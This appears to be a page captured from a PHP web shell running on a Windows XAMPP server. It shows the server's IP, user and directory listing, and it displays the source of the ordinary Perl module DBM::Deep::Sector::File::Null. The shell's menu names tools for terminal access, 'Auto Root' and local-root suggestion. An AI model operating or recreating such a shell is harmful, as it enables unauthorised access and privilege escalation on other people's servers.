Windows NT KAMIDAKI 10.0 build 19045 (Windows 10) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.3.9
Server IP : 192.168.3.16 & Your IP : 216.73.216.52
Domains :
Cant Read [ /etc/named.conf ]
User : SISTEMA
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
C: /
xampp /
perl /
vendor /
lib /
DBM /
Deep /
Sector /
File /
Delete
Unzip
Name
Size
Permission
Date
Action
BucketList.pm
10.35
KB
-rw-rw-rw-
2018-05-21 02:53
Data.pm
264
B
-rw-rw-rw-
2018-05-21 02:53
Index.pm
2.27
KB
-rw-rw-rw-
2018-05-21 02:53
Null.pm
1.26
KB
-rw-rw-rw-
2018-05-21 02:53
Reference.pm
15.81
KB
-rw-rw-rw-
2018-05-21 02:53
Scalar.pm
3.69
KB
-rw-rw-rw-
2018-05-21 02:53
Save
Rename
package DBM::Deep::Sector::File::Null; use 5.008_004; use strict; use warnings FATAL => 'all'; use base qw( DBM::Deep::Sector::File::Data ); my $STALE_SIZE = 2; # Please refer to the pack() documentation for further information my %StP = ( 1 => 'C', # Unsigned char value (no order needed as it's just one byte) 2 => 'n', # Unsigned short in "network" (big-endian) order 4 => 'N', # Unsigned long in "network" (big-endian) order 8 => 'Q', # Usigned quad (no order specified, presumably machine-dependent) ); sub type { $_[0]{engine}->SIG_NULL } sub data_length { 0 } sub data { return } sub _init { my $self = shift; my $engine = $self->engine; unless ( $self->offset ) { my $leftover = $self->size - $self->base_size - 1 * $engine->byte_size - 1; $self->{offset} = $engine->_request_data_sector( $self->size ); $engine->storage->print_at( $self->offset, $self->type ); # Sector type # Skip staleness counter $engine->storage->print_at( $self->offset + $self->base_size, pack( $StP{$engine->byte_size}, 0 ), # Chain loc pack( $StP{1}, $self->data_length ), # Data length chr(0) x $leftover, # Zero-fill the rest ); return; } } 1; __END__